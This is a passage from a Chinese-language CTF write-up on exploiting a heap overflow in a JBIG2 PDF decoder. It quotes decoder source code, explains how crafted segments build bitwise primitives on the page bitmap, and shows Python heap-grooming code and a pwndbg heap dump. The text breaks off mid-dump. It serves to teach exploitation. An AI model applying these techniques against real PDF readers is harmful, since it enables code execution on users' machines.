cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JBIG2Stream::readGenericRefinementRegionSeg</span><span class="params">(Guint segNum, GBool imm,</span></span></span><br><span class="line"><span class="params"><span class="function">                                                 GBool lossless, Guint length,</span></span></span><br><span class="line"><span class="params"><span class="function">                                                 Guint *refSegs,</span></span></span><br><span class="line"><span class="params"><span class="function">                                                 Guint nRefSegs)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="keyword">if</span> (nRefSegs == <span class="number">1</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (!(seg = <span class="built_in">findSegment</span>(refSegs[<span class="number">0</span>])) ||</span><br><span class="line">            seg-&gt;<span class="built_in">getType</span>() != jbig2SegBitmap)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="built_in">error</span>(errSyntaxError, <span class="built_in">getPos</span>(),</span><br><span class="line">                  <span class="string">&quot;Bad bitmap reference in JBIG2 generic refinement segment&quot;</span>);</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        refBitmap = (JBIG2Bitmap *)seg;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        refBitmap = pageBitmap-&gt;<span class="built_in">getSlice</span>(x, y, w, h);</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="comment">// read</span></span><br><span class="line">    bitmap = <span class="built_in">readGenericRefinementRegion</span>(w, h, templ, tpgrOn,</span><br><span class="line">                                         refBitmap, <span class="number">0</span>, <span class="number">0</span>, atx, aty);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// combine the region bitmap into the page bitmap</span></span><br><span class="line">    <span class="keyword">if</span> (imm)</span><br><span class="line">    &#123;</span><br><span class="line">        pageBitmap-&gt;<span class="built_in">combine</span>(bitmap, x, y, extCombOp);</span><br><span class="line">        <span class="keyword">delete</span> bitmap;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// store the region bitmap</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        bitmap-&gt;<span class="built_in">setSegNum</span>(segNum);</span><br><span class="line">        segments-&gt;<span class="built_in">append</span>(bitmap);</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ol><li><p>当 GenericRefinementRegionSeg <strong>不引用任何段时</strong>，变量 nRefSegs 为 0，此时 <strong>refBitmap 为 pageBitmap 上指定 x、y、w、h 属性的一块数据空间</strong>。</p><p>由于函数 <code>readGenericRefinementRegion</code> 只会受到 refBitmap 的影响，因此我们可以认定传出的bitmap 变量等价于 pageBitmap 上特定区域的数据。</p><p>接下来，若我们指定 imm 为 false，那么这块等价于 pageBitmap 上特定区域的数据，将被存储进 segments 数组中。</p></li><li><p>若下一次解析 GenericRefinementRegionSeg  时引用了第一步创建的段，那么此时 refBitmap 为第一步创建的 Bitmap。这样当 imm 为 true 时，第一步创建的 Bitmap 将会和 pageBitmap 上指定的位置进行 combine 操作，即位运算。</p></li><li><p>由于第一步创建的 bitmap 是和 pageBitmap 相关，因此整个过程就等价于</p><ul><li>从 pageBitmap 上<strong>特定位置1</strong>取下一块数据，并保存至 segments 上</li><li>从 segments 上取下这块数据，并将其与 pageBitmap 上<strong>特定位置2</strong>进行位运算。</li></ul><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">+----------------------&gt; x-axis</span><br><span class="line">|</span><br><span class="line">|             .(2)</span><br><span class="line">|</span><br><span class="line">|    .(1)</span><br><span class="line">|</span><br><span class="line">V </span><br><span class="line">y-axis</span><br></pre></td></tr></table></figure></li></ol><p>如此，便达到了<strong>让 pageBitmap 上指定两个位置的数据进行位运算的操作</strong>。我们将使用该操作来一步步构建位运算原语、乃至加法器。</p><h4 id="f-TextRegionSeg">f. TextRegionSeg</h4><p>TextRegionSeg  可以<strong>引用</strong>指定的 <strong>SymbolDictSeg</strong>，并对其中的任意 instance 进行操作。</p><blockquote><p>需要注意的是，JBIG2Globals Stream 中的 Segment 不允许引用任何 Segment，因此 TextRegionSeg 不能存放在 JBIG2Globals 流中。</p></blockquote><p>整体流程大致如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JBIG2Stream::readTextRegionSeg</span><span class="params">(Guint segNum, GBool imm,</span></span></span><br><span class="line"><span class="params"><span class="function">                                    GBool lossless, Guint length,</span></span></span><br><span class="line"><span class="params"><span class="function">                                    Guint *refSegs, Guint nRefSegs)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="comment">// get the symbol bitmaps</span></span><br><span class="line">    <span class="comment">// 从所引用的每个段上，将每个 instance 拷贝到 syms 数组中</span></span><br><span class="line">    syms = (JBIG2Bitmap **)<span class="built_in">gmallocn</span>(numSyms, <span class="built_in">sizeof</span>(JBIG2Bitmap *));</span><br><span class="line">    kk = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; nRefSegs; ++i)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> ((seg = <span class="built_in">findSegment</span>(refSegs[i])))</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span> (seg-&gt;<span class="built_in">getType</span>() == jbig2SegSymbolDict)</span><br><span class="line">            &#123;</span><br><span class="line">                symbolDict = (JBIG2SymbolDict *)seg;</span><br><span class="line">                <span class="keyword">for</span> (k = <span class="number">0</span>; k &lt; symbolDict-&gt;<span class="built_in">getSize</span>(); ++k)</span><br><span class="line">                &#123;</span><br><span class="line">                    syms[kk++] = symbolDict-&gt;<span class="built_in">getBitmap</span>(k);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="comment">// 执行 readTextRegion 函数，将指定的 syms 与新创建出来的 bitmap 进行 combine 操作</span></span><br><span class="line">    bitmap = <span class="built_in">readTextRegion</span>(huff, refine, w, h, numInstances,</span><br><span class="line">                            logStrips, numSyms, symCodeTab, symCodeLen, syms,</span><br><span class="line">                            defPixel, combOp, transposed, refCorner, sOffset,</span><br><span class="line">                            huffFSTable, huffDSTable, huffDTTable,</span><br><span class="line">                            huffRDWTable, huffRDHTable,</span><br><span class="line">                            huffRDXTable, huffRDYTable, huffRSizeTable,</span><br><span class="line">                            templ, atx, aty);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">gfree</span>(syms);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// combine the region bitmap into the page bitmap</span></span><br><span class="line">    <span class="comment">// 将当前 bitmap 与 pageBitmap 进行 combine 操作，传递所引用的 instance 上的值至 pageBitmap 上</span></span><br><span class="line">    <span class="keyword">if</span> (imm)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (pageH == <span class="number">0xffffffff</span> &amp;&amp; y + h &gt; curPageH)</span><br><span class="line">        &#123;</span><br><span class="line">            pageBitmap-&gt;<span class="built_in">expand</span>(y + h, pageDefPixel);</span><br><span class="line">        &#125;</span><br><span class="line">        pageBitmap-&gt;<span class="built_in">combine</span>(bitmap, x, y, extCombOp);</span><br><span class="line">        <span class="keyword">delete</span> bitmap;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// store the region bitmap</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        bitmap-&gt;<span class="built_in">setSegNum</span>(segNum);</span><br><span class="line">        segments-&gt;<span class="built_in">append</span>(bitmap);</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="3-JBIG2Encode">3. JBIG2Encode</h3><h4 id="a-encode-Bitmap">a. encode Bitmap</h4><p>通过阅读上面关于 Segments 的源代码，我们可以很容易的得知：在诸如 <code>readGenericBitmap</code> 等读入 bitmap 的函数中，hso 会尝试<strong>从外部 JBIG2Stream 流中，使用某种解码器来对读入的 bitmap 进行解码</strong>（例如代码中多次出现 <code>arithDecoder-&gt;decodeInt</code> 等调用）。</p><p>因此，作为提供外部 JBIG2Stream 流的我们，需要对写入至 pdf 中的 bitmap 做对应的编码操作。</p><p>从最上面的 <code>JBIG2Stream::reset</code> 函数中可以得知，一共由三种解码器：</p><ul><li><strong>JArithmeticDecoder</strong></li><li>JBIG2HuffmanDecoder</li><li>JBIG2MMRDecoder</li></ul><p>而这些解码器的内部算法，如果要让我们徒手撸一个的话 ，那么做题效率就会非常低。因此，我们可以<strong>使用 <code>jbig2enc</code> 库</strong>来帮助我们完成数据编码操作，该库已经实现了 <strong>JArithmeticDecoder</strong> 状态机的编码算法，故我们无需了解内部细节即可完成对 bitmap 的编码过程。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> git@github.com:agl/jbig2enc.git</span><br></pre></td></tr></table></figure><p>但是，该库是使用 C++ 编写的，若 exploit 也全部使用 C++ 完成，则工作量较高。因此，我们可以使用 pybind11 来暴露 jbig2enc 中的部分接口给 python，这样编写 exploit 时可以使用 python 语言来完成。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get install pybind11-dev</span><br></pre></td></tr></table></figure><p>最后需要注意的是，由于 <code>jbig2enc</code> 的接口会<strong>使用到大量的指针</strong>，而<strong>将指针暴露给 python 接口调用</strong>是一个非常不明智的选择（因为如果让 python 来调用需要指针的接口，则会降低开发速度和<strong>提高触发 bug 的几率</strong>），因此我们最好根据当前的需求，即：</p><blockquote><p><strong>将 bitmap 数据以 JArithmeticDecoder 方式来进行编码</strong>。</p></blockquote><p>来额外编写一个 wrapper C++ 代码，实现三个封装好的结构体/枚举：</p><ul><li><code>ArithEncoder</code>：调用 jbig2enc 对 bitmap 进行编码的类</li><li><code>Bitmap</code>：待被编码的 bitmap 数据</li><li><code>ArithEncoder::Proc</code>：<code>ArithEncoder</code> 编码器的状态枚举</li></ul><p>最后将这三个结构体/枚举 暴露给 python 调用，避免让 python 直接操作指针。</p><blockquote><p>这一小节所实现的代码，正对应于 exp 中的以下几个文件：</p><ul><li><code>hso-groupie/exploit/jbig2arith.[cc,h]</code></li><li><code>hso-groupie/exploit/jbjbarith.[cc,h]</code></li></ul></blockquote><h4 id="b-encode-segments">b. encode segments</h4><p>hso 在 read segments 时，首先会读取出每个当前 segment 的 段号 segNum、segFlags、refFlags 等一系列字段和标志，之后才是进行（可能的） bitmap 读取。</p><p>这些字段和标志同样是需要我们手动放进 JBIG2Stream 中。由于这里的字段和标志不需要使用解码器进行解码，因此可以手动编写代码将字段一个个放置进流中。</p><p>这一步的操作位于 exp 中的 <code>hso-groupie/exploit/jbig2.py</code> ，该脚本为所有用到的 segment 都编写了一个对应的 <strong>python 结构转 JBIG2Stream 字节流</strong>的操作；同时，上一节中暴露给 python 所调用的 bitmap encoder 接口，也是在该脚本中所使用。</p><p>这样，当我们使用 python 设计好一个个特定的 segments 后，我们便可以将这些 segments 快速转换成 JBIG2Stream 流数据，方便快捷。</p><h2 id="五、漏洞利用流程">五、漏洞利用流程</h2><h3 id="1-堆风水">1. 堆风水</h3><h4 id="a-创建堆空洞">a. 创建堆空洞</h4><p>先放上这张镇楼图：</p><p><img src="/2022/02/rwctf2022_hso/a.jpg" alt="img"></p><p>为了利用这个堆溢出漏洞，我们需要充分发动堆风水，将指定的结构放至对应的堆块。这里，我们的堆风水需要完成以下几个目标：</p><ul><li><p>让 pdf 在解析 TextRegionSeg 时，其创建的 syms 指针数组位于 <code>undersized syms buffer</code> 处</p></li><li><p>让内含<strong>存放超多指针的 JBIG2SymbolDict 结构体</strong>的 segment 放置在 <code>segments GList backing buffer</code> 处</p><blockquote><p>这里，我们打算让 JBIG2SymbolDict 结构体存放至 <strong>global segment</strong> 中，因为 SymbolDictSegment 不依赖与任何的 Segments，但是后续的 TextRegionSegment 会依赖这些 SymbolDictSegment。</p></blockquote></li><li><p>让 pageBitmap 结构体占据图中 <code>JBIG2Bitmap</code> 那块内存，并让其 data 占据图中上面 <code>bitmap backing buffer</code> 那块内存。</p><blockquote><p>通读代码，我们可以得知绝大多数 segments 在解析时，都可以让其 bitmap 与 pageBitmap 进行运算，并将结果保存在 pageBitmap 上。因此让 pageBitmap 拥有越界读写的能力是最好的选择。</p></blockquote></li></ul><p>我们先尝试在 global segment 中分配三个不同 Bitmap 大小的 SymbolDict 出来。这里分配不同大小的 SymbolDict 是为了后续在 TextRegionSeg 中，排列组合 size 至溢出，因此这三个堆块的位置<strong>不需要关心</strong>：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># global segment</span></span><br><span class="line">global_file = [</span><br><span class="line">    SymbolDict(<span class="number">0</span>, [Bitmap(<span class="number">1</span>, <span class="number">1</span>)] * <span class="number">0x10000</span>),</span><br><span class="line">    SymbolDict(<span class="number">1</span>, [Bitmap(<span class="number">1</span>, <span class="number">1</span>)] * (size_to_overflow // <span class="number">8</span>)),</span><br><span class="line">    SymbolDict(<span class="number">2</span>, [Bitmap(<span class="number">1</span>, <span class="number">1</span>)]),</span><br><span class="line">]</span><br></pre></td></tr></table></figure><blockquote><p>其中 <code>size_to_overflow</code> 为上图中 <code>overflow</code> 的字节数，具体计算过程稍后介绍。</p></blockquote><p>此时我们看看分配完这三个 SymbolDict 后的 bins 是什么情况，可以看到<strong>有大量的碎片堆块</strong>：</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">pwndbg&gt; </span><span class="language-bash">bins</span></span><br><span class="line">tcachebins</span><br><span class="line">0x20 [  4]: 0x55555579f8e0 —▸ 0x5555557b9550 —▸ 0x5555557b0c10 —▸ 0x5555557b0c60 ◂— 0x0</span><br><span class="line">0x30 [  5]: 0x5555557ab330 —▸ 0x5555557b0c30 —▸ 0x5555557b0c80 —▸ 0x555555799280 —▸ 0x5555557992d0 ◂— 0x0</span><br><span class="line">0x40 [  7]: 0x5555557f7f90 —▸ 0x5555557f8f10 —▸ 0x5555557f9100 —▸ 0x5555557f7bb0 —▸ 0x5555557fe710 —▸ 0x5555557a0320 —▸ 0x555555797210 ◂— 0x0</span><br><span class="line">0x50 [  1]: 0x5555557a02b0 ◂— 0x0</span><br><span class="line">0x60 [  4]: 0x5555557ab3c0 —▸ 0x5555557a9e40 —▸ 0x5555557ab890 —▸ 0x5555557ab790 ◂— 0x0</span><br><span class="line">0x70 [  1]: 0x5555557ac760 ◂— 0x0</span><br><span class="line">0x90 [  1]: 0x5555557b94c0 ◂— 0x0</span><br><span class="line">0xa0 [  3]: 0x555555798e00 —▸ 0x5555557b6930 —▸ 0x5555557b6a10 ◂— 0x0</span><br><span class="line">0xb0 [  2]: 0x5555557ba520 —▸ 0x5555557b9410 ◂— 0x0</span><br><span class="line">0xc0 [  3]: 0x5555557bec00 —▸ 0x5555557bf620 —▸ 0x5555557b1220 ◂— 0x0</span><br><span class="line">0xd0 [  5]: 0x555555799ec0 —▸ 0x5555557b0cb0 —▸ 0x5555557c5400 —▸ 0x5555557c37f0 —▸ 0x5555557bfcf0 ◂— 0x0</span><br><span class="line">0xe0 [  3]: 0x5555557be4b0 —▸ 0x5555557a9a30 —▸ 0x5555557bc750 ◂— 0x0</span><br><span class="line">0xf0 [  3]: 0x5555557c6d30 —▸ 0x5555557bd370 —▸ 0x5555557bd4a0 ◂— 0x0</span><br><span class="line">0x100 [  2]: 0x5555557c4360 —▸ 0x5555557c44a0 ◂— 0x0</span><br><span class="line">0x110 [  1]: 0x555555797100 ◂— 0x0</span><br><span class="line">0x120 [  2]: 0x5555557c1000 —▸ 0x5555557c5880 ◂— 0x0</span><br><span class="line">0x140 [  3]: 0x5555557c7c80 —▸ 0x5555557c7430 —▸ 0x5555557cc180 ◂— 0x0</span><br><span class="line">0x150 [  3]: 0x5555557cdac0 —▸ 0x5555557c83f0 —▸ 0x5555557c8590 ◂— 0x0</span><br><span class="line">0x160 [  2]: 0x55555579fc00 —▸ 0x5555557a4420 ◂— 0x0</span><br><span class="line">0x170 [  3]: 0x555555797c20 —▸ 0x5555557d36c0 —▸ 0x5555557d3550 ◂— 0x0</span><br><span class="line">0x180 [  2]: 0x5555557bff50 —▸ 0x5555557d8010 ◂— 0x0</span><br><span class="line">0x190 [  7]: 0x5555557adb80 —▸ 0x5555557d8530 —▸ 0x5555557ad570 —▸ 0x5555557ac7d0 —▸ 0x5555557a8710 —▸ 0x5555557a8d60 —▸ 0x5555557aad00 ◂— 0x0</span><br><span class="line">0x1a0 [  2]: 0x5555557d2890 —▸ 0x5555557ad700 ◂— 0x0</span><br><span class="line">0x1b0 [  2]: 0x5555557a8ef0 —▸ 0x5555557aea50 ◂— 0x0</span><br><span class="line">0x1c0 [  2]: 0x5555557d1bb0 —▸ 0x55555579ad70 ◂— 0x0</span><br><span class="line">0x1d0 [  2]: 0x555555796b00 —▸ 0x555555796640 ◂— 0x0</span><br><span class="line">0x1f0 [  2]: 0x5555557a6410 —▸ 0x5555557a6220 ◂— 0x0</span><br><span class="line">0x200 [  2]: 0x55555576a670 —▸ 0x5555557aae90 ◂— 0x0</span><br><span class="line">0x220 [  2]: 0x5555557d8310 —▸ 0x5555557ac960 ◂— 0x0</span><br><span class="line">0x230 [  1]: 0x5555557bd980 ◂— 0x0</span><br><span class="line">0x270 [  1]: 0x5555557ba6d0 ◂— 0x0</span><br><span class="line">0x2b0 [  1]: 0x5555557abdc0 ◂— 0x0</span><br><span class="line">0x2c0 [  1]: 0x555555798320 ◂— 0x0</span><br><span class="line">0x2e0 [  1]: 0x5555557aa730 ◂— 0x0</span><br><span class="line">0x300 [  2]: 0x5555557a5c60 —▸ 0x5555557a9590 ◂— 0x0</span><br><span class="line">0x310 [  7]: 0x5555557ae510 —▸ 0x5555557ac110 —▸ 0x5555557ad010 —▸ 0x5555557abab0 —▸ 0x5555557a9280 —▸ 0x5555557aa420 —▸ 0x5555557a76c0 ◂— 0x0</span><br><span class="line">0x320 [  3]: 0x555555799f90 —▸ 0x5555557becc0 —▸ 0x5555557bab30 ◂— 0x0</span><br><span class="line">0x350 [  2]: 0x5555557bcb40 —▸ 0x5555557c3bd0 ◂— 0x0</span><br><span class="line">0x390 [  1]: 0x5555557a88a0 ◂— 0x0</span><br><span class="line">0x3b0 [  2]: 0x555555797250 —▸ 0x5555557a79d0 ◂— 0x0</span><br><span class="line">0x3c0 [  1]: 0x5555557d39d0 ◂— 0x0</span><br><span class="line">0x3d0 [  1]: 0x5555557cccc0 ◂— 0x0</span><br><span class="line">0x400 [  1]: 0x55555576aa50 ◂— 0x0</span><br><span class="line">0x410 [  3]: 0x555555797810 —▸ 0x5555557bf1d0 —▸ 0x5555557a7f90 ◂— 0x0</span><br><span class="line">fastbins</span><br><span class="line">0x20: 0x0</span><br><span class="line">0x30: 0x0</span><br><span class="line">0x40: 0x0</span><br><span class="line">0x50: 0x0</span><br><span class="line">0x60: 0x0</span><br><span class="line">0x70: 0x0</span><br><span class="line">0x80: 0x0</span><br><span class="line">unsortedbin</span><br><span class="line">all: 0x5555558304b0 —▸ 0x7ffff7ad8c00 (main_arena+96) ◂— 0x5555558304b0</span><br><span class="line">smallbins</span><br><span class="line">0x20: 0x5555557a99e0 —▸ 0x7ffff7ad8c10 (main_arena+112) ◂— 0x5555557a99e0</span><br><span class="line">0xb0: 0x5555557f82f0 —▸ 0x7ffff7ad8ca0 (main_arena+256) ◂— 0x5555557f82f0</span><br><span class="line">0xf0: 0x5555557d0ab0 —▸ 0x7ffff7ad8ce0 (main_arena+320) ◂— 0x5555557d0ab0</span><br><span class="line">0x120: 0x5555557992f0 —▸ 0x7ffff7ad8d10 (main_arena+368) ◂— 0x5555557992f0</span><br><span class="line">0x190: 0x5555557f7df0 —▸ 0x5555557f8d70 —▸ 0x5555557f8f60 —▸ 0x5555557f7a10 —▸ 0x5555557fe570 ◂— ...</span><br><span class="line">0x1c0 [corrupted]</span><br><span class="line">FD: 0x5555557f1a30 —▸ 0x5555557f4780 —▸ 0x5555557d15f0 —▸ 0x5555557e49d0 —▸ 0x55555579ecf0 ◂— ...</span><br><span class="line">BK: 0x5555557d0c90 —▸ 0x5555557d06f0 —▸ 0x5555557d1410 —▸ 0x5555557d0e70 —▸ 0x55555579e390 ◂— ...</span><br><span class="line">0x1d0 [corrupted]</span><br><span class="line">FD: 0x5555557f9910 —▸ 0x5555557f9720 —▸ 0x5555557f85b0 —▸ 0x5555557fe960 —▸ 0x5555557f66b0 ◂— ...</span><br><span class="line">BK: 0x5555557f9530 —▸ 0x5555557f9150 —▸ 0x5555557fb050 —▸ 0x5555557fdd90 —▸ 0x5555557fd1e0 ◂— ...</span><br><span class="line">0x1e0 [corrupted]</span><br><span class="line">FD: 0x5555557a13c0 —▸ 0x5555557a0bc0 —▸ 0x5555557a11c0 —▸ 0x5555557a0570 —▸ 0x5555557a0770 ◂— ...</span><br><span class="line">BK: 0x5555557fcbf0 —▸ 0x5555557fc9f0 —▸ 0x5555557fdb90 —▸ 0x5555557fe760 —▸ 0x5555557fc210 ◂— ...</span><br><span class="line">0x1f0: 0x5555557ba930 —▸ 0x5555557f1120 —▸ 0x5555557d19b0 —▸ 0x5555557befd0 —▸ 0x7ffff7ad8de0 (main_arena+576) ◂— ...</span><br><span class="line">0x200: 0x5555557a9b00 —▸ 0x5555557df570 —▸ 0x5555557a8500 —▸ 0x7ffff7ad8df0 (main_arena+592) ◂— 0x5555557a9b00</span><br><span class="line">0x220 [corrupted]</span><br><span class="line">FD: 0x5555557f3c20 —▸ 0x5555557ecce0 —▸ 0x5555557e8180 —▸ 0x5555557f57f0 —▸ 0x5555557ee5a0 ◂— ...</span><br><span class="line">BK: 0x5555557f4540 —▸ 0x5555557f2130 —▸ 0x5555557f27e0 —▸ 0x5555557eec60 —▸ 0x5555557f2ea0 ◂— ...</span><br><span class="line">0x230 [corrupted]</span><br><span class="line">FD: 0x5555557ae810 —▸ 0x5555557f49d0 —▸ 0x5555557e2710 —▸ 0x5555557f4c20 —▸ 0x5555557a0970 ◂— ...</span><br><span class="line">BK: 0x5555557f0a20 —▸ 0x5555557a23a0 —▸ 0x5555557e5a20 —▸ 0x5555557a3d20 —▸ 0x5555557a3f70 ◂— ...</span><br><span class="line">0x240 [corrupted]</span><br><span class="line">FD: 0x5555557f5590 —▸ 0x5555557f1330 —▸ 0x5555557e3730 —▸ 0x5555557f4e70 —▸ 0x5555557a1ef0 ◂— ...</span><br><span class="line">BK: 0x5555557ec840 —▸ 0x5555557f50d0 —▸ 0x5555557a4660 —▸ 0x5555557e4090 —▸ 0x5555557f5330 ◂— ...</span><br><span class="line">0x250: 0x55555579a760 —▸ 0x7ffff7ad8e40 (main_arena+672) ◂— 0x55555579a760</span><br><span class="line">0x270 [corrupted]</span><br><span class="line">FD: 0x5555557dd3a0 —▸ 0x5555557e1a10 —▸ 0x5555557e0810 —▸ 0x5555557e02e0 —▸ 0x5555557e0aa0 ◂— ...</span><br><span class="line">BK: 0x5555557a54a0 —▸ 0x5555557a5210 —▸ 0x5555557e1f40 —▸ 0x5555557e0aa0 —▸ 0x5555557e02e0 ◂— ...</span><br><span class="line">0x280 [corrupted]</span><br><span class="line">FD: 0x5555557c7560 —▸ 0x5555557b0d70 —▸ 0x5555557e0570 —▸ 0x5555557df2d0 —▸ 0x5555557df810 ◂— ...</span><br><span class="line">BK: 0x5555557e21d0 —▸ 0x5555557deaf0 —▸ 0x5555557df030 —▸ 0x5555557e2470 —▸ 0x5555557ded90 ◂— ...</span><br><span class="line">0x290: 0x5555557acb70 —▸ 0x5555557ddb10 —▸ 0x5555557e0030 —▸ 0x5555557e1760 —▸ 0x5555557de5a0 ◂— ...</span><br><span class="line">0x2a0: 0x5555557dfd70 —▸ 0x5555557dfab0 —▸ 0x7ffff7ad8e90 (main_arena+752) ◂— 0x5555557dfd70</span><br><span class="line">0x2c0: 0x5555557a5f50 —▸ 0x5555557f5c90 —▸ 0x7ffff7ad8eb0 (main_arena+784) ◂— 0x5555557a5f50 /* &#x27;P_zUUU&#x27; */</span><br><span class="line">0x340: 0x5555557f5f70 —▸ 0x5555557ac410 —▸ 